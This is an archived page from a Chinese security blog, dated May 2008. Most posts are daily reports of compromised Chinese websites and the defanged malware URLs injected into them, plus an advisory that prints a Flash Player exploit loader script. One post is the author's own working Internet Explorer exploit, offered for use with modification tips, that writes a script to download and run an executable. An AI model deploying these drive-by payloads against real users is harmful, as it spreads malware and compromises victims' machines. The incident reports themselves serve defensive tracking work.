This theme is downloaded from wordpress themes website.

Archive for May, 2008

5月31日挂马简报

木蚂蚁绿色软件园(hXXp://soft.mumayi.net/)被插入恶意代码:

hXXp://www.zanlaiye.net/1.htm?12

Popularity: 35% [?]

网站挂马记录 GreySign 31 May 2008 No Comments

5月30日挂马简报

兰州信息港(hXXp://www.lzxxg.com/law/ShowClass.asp?ClassID=174)被插入恶意代码:

hXXp://ca.winvv.com/cn.htm

Popularity: 34% [?]

网站挂马记录 GreySign 30 May 2008 No Comments

5月29日挂马简报

1000wg外挂网(hXXp://www.10000wg.com)被插入恶意代码:

hXXp://bao.5bao.net/123/web.htm

Popularity: 41% [?]

网站挂马记录 GreySign 29 May 2008 No Comments

5月28日挂马简报

磐石市龙腾过滤材料厂(hXXp://www.jlpslt.com/)被插入恶意代码:

hXXp://%7A%73%68%61%63%6B%2E%63%6E

hXXp://%76%63%63%64%2E%63%6E

hXXp://css.qpoe.com/css.js?mo=8&esa=21

Popularity: 43% [?]

网站挂马记录 GreySign 28 May 2008 No Comments

5月27日挂马简报

DIY部落(hXXp://www.diybl.com)被插入恶意代码:(”<iframe src=hXXp:\/\/www.51yess.net.cn\/s30.html?0086 width=100 height=0><\/iframe>”);

Popularity: 42% [?]

网站挂马记录 GreySign 28 May 2008 No Comments

FLASH网马悄然现身互联网

发布日期:2008-5-26

最后更新日期:2008-5-26   1737GMT

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:

 <script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>  以下为正常的FLASH文件使用的脚本:

 // Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop(); 该恶意FLASH部分内容如下:

0805026.jpg建议:


厂商补丁: Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.adobe.com/go/getflash

Popularity: 78% [?]

漏洞公告 GreySign 26 May 2008 No Comments

5月26日挂马简报

河北收藏网(hXXp://www.hebeisc.org/)被插入恶意代码:

hXXp://www.paopao550.cn/bak/1013.htm

hXXp://%66%6b%6f%6f%6d%6d%2e%63%6f%6d/103/

Popularity: 51% [?]

网站挂马记录 GreySign 26 May 2008 No Comments

5月25日挂马简报

天相投顾网首页(hXXp://www.txsec.com)被插入恶意代码:
[wide]hXXp://www.txsec.com/
    [script]hXXp://www.txsec.com/js/newpass9.js
        [frame]hXXp://www.969xiao.net/25.htm

Popularity: 45% [?]

网站挂马记录 GreySign 26 May 2008 No Comments

IE0DAY网马

这个漏洞参考http://www.milw0rm.com/exploits/5619

Author: Greysign

2008-5-24

Team:http://www.scanw.com/blog

哈哈。标题吸引吗。

修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。

这个漏洞执行后可以远程下载任意文件并执行。

第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。

不过。这个漏洞利用的好也可以玩一玩的。

<html>
<body>
Print me with table of links to execute
<a href=”http://www.bla.com?x=b<script defer >
var   ForWriting   =   2;
var   strFile   =   ‘c:\\test2.js’;
var   objFSO   =   new   ActiveXObject(’Scripting.FileSystemObject’);     
var   objStream   =   objFSO.OpenTextFile(strFile,ForWriting,true,false);  
objStream.WriteLine(’var objArgs = \’http://127.0.0.1/test.exe\’;');
objStream.WriteLine(’var objargss =\’c:\\\\gtest.exe\’;');
objStream.WriteLine(’var sGet=new ActiveXObject(\’ADODB.Stream\’);’);
objStream.WriteLine(’var xGet = false;’);
objStream.WriteLine(’try {’);
objStream.WriteLine(’xGet = new XMLHttpRequest();’);
objStream.WriteLine(’} ‘);
objStream.WriteLine(’catch (trymicrosoft) {’);
objStream.WriteLine(’try {’);
objStream.WriteLine(’    xGet = new ActiveXObject(\’Msxml2.XMLHTTP\’);’);
objStream.WriteLine(’} ‘);
objStream.WriteLine(’catch (othermicrosoft) {’);
objStream.WriteLine(’    try {’);
objStream.WriteLine(’      xGet = new ActiveXObject(\’Microsoft.XMLHTTP\’);’);
objStream.WriteLine(’    } ‘);
objStream.WriteLine(’catch (failed) {’);
objStream.WriteLine(’      xGet = false;’);
objStream.WriteLine(’    }’);
objStream.WriteLine(’}');
objStream.WriteLine(’}');
objStream.WriteLine(’xGet.Open (\’GET\’,objArgs.toLowerCase(),0);’);
objStream.WriteLine(’xGet.Send();’);
objStream.WriteLine(’sGet.Mode=3;’);
objStream.WriteLine(’sGet.Type=1;’);
objStream.WriteLine(’sGet.Open();’);
objStream.WriteLine(’sGet.Write (xGet.ResponseBody);’);
objStream.WriteLine(’sGet.SaveToFile (objargss.toLowerCase(),2);’);
objStream.WriteLine(’var x=new ActiveXObject(\’WScript.Shell\’);’);
objStream.WriteLine(’x.Run(objargss);’);
objStream.Close();
var   objShell   =   new   ActiveXObject(’wscript.shell’);  
objShell.Run(strFile);
</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>

Popularity: 56% [?]

Web2.0 Security GreySign 24 May 2008 No Comments

5月24日挂马简报

河北商网 中国商报河北频道(hXXp://www.hebeisw.cn/)被插入恶意代码:

hXXp://ca.winvv.com/cn.htm

Popularity: 51% [?]

网站挂马记录 GreySign 24 May 2008 No Comments

Next Page »

Recommended: Buy movies online.